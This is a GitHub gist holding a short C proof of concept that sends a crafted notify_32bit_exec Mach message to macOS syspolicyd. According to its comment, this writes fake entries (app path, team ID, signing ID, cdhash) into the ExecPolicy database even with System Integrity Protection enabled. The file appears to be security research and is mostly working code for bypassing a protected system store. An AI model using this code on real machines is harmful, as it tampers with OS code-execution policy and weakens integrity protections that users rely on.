Created
February 14, 2019 16:18
-
-
Save knightsc/6aa75ec6dc8940fa7d381140fb57236a to your computer and use it in GitHub Desktop.
Example of sedning notify_32bit_exec MIG message to syspolicyd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <errno.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <mach/mach.h> | |
/* | |
This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy | |
even with SIP on. Basically before syspolicyd determines if the values | |
you pass can be checked or not it will save them to the ExecPolicy | |
database. | |
There are still errors when passing in a real application. | |
default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0) | |
default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private> | |
error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3 | |
*/ | |
struct message { | |
mach_msg_header_t hdr; | |
uint32_t u1; | |
uint32_t u2; | |
uint32_t eval_id; | |
uint32_t u3; | |
uid_t uid; | |
pid_t pid; | |
uint32_t u4; | |
uint32_t path_size; | |
char path[1024]; | |
uint32_t u5; | |
uint32_t team_id_size; | |
char team_id[64]; | |
uint32_t u6; | |
uint32_t signing_id_size; | |
char signing_id[128]; | |
char cdhash[20]; | |
}; | |
int | |
main(int argc, char *argv[]) | |
{ | |
kern_return_t kr; | |
mach_port_t host; | |
mach_port_t host_priv; | |
mach_port_t asp_port; | |
struct message msg; | |
host = mach_host_self(); | |
kr = host_get_host_priv_port(host, &host_priv); | |
if (kr != KERN_SUCCESS) { | |
printf("Error getting host_priv port\n"); | |
exit(1); | |
} | |
kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port); | |
if (kr != KERN_SUCCESS) { | |
printf("Error getting syspolicyd mig port\n"); | |
exit(1); | |
} | |
msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND); | |
msg.hdr.msgh_size = sizeof(msg); | |
msg.hdr.msgh_remote_port = asp_port; | |
msg.hdr.msgh_local_port = MACH_PORT_NULL; | |
msg.hdr.msgh_voucher_port = MACH_PORT_NULL; | |
msg.hdr.msgh_id = 0x48a8; | |
msg.u1 = 0; | |
msg.u2 = 1; | |
msg.eval_id = 2; | |
msg.u3 = 0; | |
msg.uid = 502; | |
msg.pid = 1; | |
msg.u4 = 0; | |
msg.path_size = 1024; | |
memset(msg.path, 0, msg.path_size); | |
strncpy(msg.path, "/Applications/FakeApp.app", msg.path_size); | |
msg.u5 = 0; | |
msg.team_id_size = 64; | |
memset(msg.team_id, 0, msg.team_id_size); | |
strncpy(msg.team_id, "ABCDEFGHIJ", msg.team_id_size); | |
msg.u6 = 0; | |
msg.signing_id_size = 128; | |
memset(msg.signing_id, 0, msg.signing_id_size); | |
strncpy(msg.signing_id, "com.fake.bundle.Id", msg.signing_id_size); | |
strncpy(msg.cdhash, "\xd7\x4a\x6b\x33\x0a\x8c\x67\xc4\x8f\xc0\xf8\xbb\xc7\xe0\xdc\x46\x55\xe2\x44\xb8", 20); | |
kr = mach_msg( | |
&msg.hdr, | |
MACH_SEND_MSG, | |
sizeof(msg), | |
0, | |
MACH_PORT_NULL, | |
MACH_MSG_TIMEOUT_NONE, | |
MACH_PORT_NULL | |
); | |
if (kr != KERN_SUCCESS) { | |
printf("Error sending mach msg\n"); | |
exit(1); | |
} | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment